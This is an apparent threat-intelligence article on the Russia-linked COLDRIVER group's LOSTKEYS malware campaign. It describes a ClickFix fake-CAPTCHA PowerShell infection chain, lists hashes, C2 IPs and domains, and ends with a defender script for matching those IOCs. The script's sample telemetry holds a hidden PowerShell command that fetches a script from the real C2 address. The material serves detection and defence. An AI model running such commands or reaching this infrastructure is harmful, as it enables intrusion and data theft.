The Google Threat Intelligence Group (GTIG) has unveiled a new malware campaign orchestrated by the Russian state-aligned threat actor COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto).
This campaign leverages a novel malware variant named LOSTKEYS, marking a significant evolution in the group’s offensive cyber capabilities.
The malware was observed in active deployments in January, March, and April 2025, targeting a spectrum of high-profile entities, including NATO governments, non-governmental organizations (NGOs), former diplomats, and individuals connected to Western military and policy circles.
Infection Chain and Evasion Techniques
The attack chain is initiated through a social engineering-driven lure: a bogus CAPTCHA webpage.

Upon “solving” the CAPTCHA, the website copies malicious PowerShell code to the victim’s clipboard and instructs them to paste and execute it through the Windows “Run” dialog, a tactic known as “ClickFix.”
This manual execution requirement is a clever evasion of automated email and browser sandboxing defenses, and reflects a broader industry trend among advanced persistent threat (APT) actors.
The initial PowerShell code fetches a second-stage script, frequently delivered from the IP address 165.227.148[.]68.
This intermediary leverages display resolution-based checks to evade sandbox environments and virtual machines by calculating the MD5 hash of the system’s display resolution; if this matches a predefined set, execution is aborted.
A unique identifier, varying per infection chain, is required to progress to subsequent stages.
The third stage consists of a Base64-encoded payload containing further PowerShell, which retrieves two additional files from the attacker-controlled infrastructure: a Visual Basic Script (VBS) decoder and an encoded payload.

Decryption is handled using a pair of unique keys, each specific to the infection chain, and a substitution cipher, making static analysis and bulk decryption impractical.
The decoder reconstructs the final stage, the LOSTKEYS malware, from the encrypted payload.
LOSTKEYS Malware Capabilities
LOSTKEYS, implemented as a VBS script, is engineered to harvest files from targeted directories, based on a hard-coded list of file extensions.
It also exfiltrates system metadata and enumerates running processes, funneling this data back to attacker-controlled command and control (C2) servers.
While COLDRIVER’s historical focus has been credential phishing, often targeting the personal or NGO-affiliated email accounts of influential Westerners, LOSTKEYS represents a tactical expansion towards direct endpoint compromise for in-depth intelligence collection.
For select high-value targets, COLDRIVER has previously deployed other custom malware, such as SPICA, to gain deeper access to document stores.
These activities have included campaigns specifically targeting individuals linked to Ukraine, journalists, and think tanks, and have been associated with occasional hack-and-leak operations.
Recent findings reveal two December 2023 malware samples masquerading as Maltego installers, which also dropped LOSTKEYS, though attribution to COLDRIVER remains inconclusive.
In response to these findings, Google has updated its Safe Browsing service to block identified malicious domains and files, and has issued government-backed threat alerts to affected Gmail and Workspace users.
Potential targets are strongly advised to enroll in Google’s Advanced Protection Program, activate Enhanced Safe Browsing, and ensure all software is up to date.
Security professionals are encouraged to review the provided YARA rules and indicators of compromise (IOCs) to bolster detection and incident response capabilities.
Indicators of Compromise (IOC) Table
| IOC (Hash/Domain/IP) | Notes |
|---|---|
| 13f7599c94b9d4b028ce02397717a128 | Stage 1: Fake CAPTCHA page, loads PowerShell |
| 2a46f07b9d3e2f8f2b3213fa8884b029 | Stage 1: Fake CAPTCHA page, loads PowerShell |
| 4c7accba35edd646584bb5a40ab78f96 | Stage 2: Device evasion and stage 3 loader |
| 3de45e5fc816e62022cd7ab1b01dae9c | Stage 2: Device evasion and stage 3 loader |
| 6b85d707c23d68f9518e757cc97adb20 | Stage 3: Retrieves and decodes final payload, contains key |
| adc8accb33d0d68faf1d8d56d7840816 | Stage 3: Retrieves and decodes final payload, contains key |
| 3233668d2e4a80b17e6357177b53539d | Decoder script, contains key |
| f659e55e06ba49777d0d5171f27565dd | Decoder script, contains key |
| 6bc411d562456079a8f1e38f3473c33a | Final payload, encoded |
| de73b08c7518861699e9863540b64f9a | Final payload, encoded |
| 28a0596b9c62b7b7aca9cac2a07b0671 | Final payload, decoded |
| 09f27d327581a60e8cb4fab92f8f4fa9 | Final payload, decoded |
| 165.227.148[.]68 | C2 |
| cloudmediaportal[.]com | C2 |
| b55cdce773bc77ee46b503dbd9430828 | Binary (Dec 2023) that executes LOSTKEYS |
| cc0f518b94289fbfa70b5fbb02ab1847 | Binary (Dec 2023) that executes LOSTKEYS |
| 02ce477a07681ee1671c7164c9cc847b | Binary (Dec 2023) that executes LOSTKEYS |
| 01c2e1cd50e709f7e861eaab89c69b6f | Binary (Dec 2023) that executes LOSTKEYS |
| 8af28bb7e8e2f663d4b797bf3ddbee7f | LOSTKEYS (Dec 2023) |
| 0a33f637a33df9b31fbb4c1ce71b2fee | LOSTKEYS (Dec 2023) |
| njala[.]dev | C2 from December 2023 |
| 80.66.88[.]67 | C2 from December 2023 |
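As an added defender-side example (not code from the GTIG report or from this article), the script below parses an excerpt of the IOC table above in the page's own pipe-delimited, defanged format, refangs the indicators, and matches them against constructed process, file and DNS telemetry records; the event field names and the sample records are assumptions.

```python
import re

# Constructed excerpt of the article's IOC table (values as published, defanged with "[.]").
IOC_TABLE = """\
IOC (Hash/Domain/IP) | Notes |
---|---|
4c7accba35edd646584bb5a40ab78f96 | Stage 2: Device evasion and stage 3 loader |
165.227.148[.]68 | C2 |
cloudmediaportal[.]com | C2 |
njala[.]dev | C2 from December 2023 |
80.66.88[.]67 | C2 from December 2023 |
"""
MD5_RE = re.compile(r"[0-9a-f]{32}")
# Dotted-quad IPs or domains as they appear (refanged) in telemetry fields.
NET_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}", re.I)

def refang(ioc):
    """Restore a publication-safe indicator ('[.]') to its matchable form."""
    return ioc.replace("[.]", ".")

def parse_ioc_table(text):
    """Map each refanged, lower-cased indicator in the pipe table to (kind, note)."""
    iocs = {}
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) < 2 or cells[0].startswith(("IOC", "---")):
            continue  # header / separator rows
        value = refang(cells[0]).lower()
        iocs[value] = ("hash" if MD5_RE.fullmatch(value) else "network", cells[1])
    return iocs

def match_events(events, iocs):
    """Return (indicator, note) pairs for telemetry records that hit the IOC set."""
    hits = []
    for ev in events:
        candidates = [ev["md5"].lower()] if "md5" in ev else []
        for field in ("cmdline", "query", "dest"):
            candidates += [m.lower() for m in NET_RE.findall(ev.get(field, ""))]
        hits += [(c, iocs[c][1]) for c in candidates if c in iocs]
    return hits

# Constructed telemetry, not from the article: a ClickFix-style PowerShell launch from
# the Run dialog (parent explorer.exe), a dropped-file hash, and a benign DNS query.
SAMPLE_EVENTS = [
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://165.227.148.68/s2"'},
    {"path": r"C:\Users\u\AppData\Local\Temp\s.ps1", "md5": "4C7ACCBA35EDD646584BB5A40AB78F96"},
    {"query": "updates.example.org"},
]
```

Run `match_events(SAMPLE_EVENTS, parse_ioc_table(IOC_TABLE))` to get the two hits (the stage-2 loader hash and the C2 address); the benign DNS query produces none.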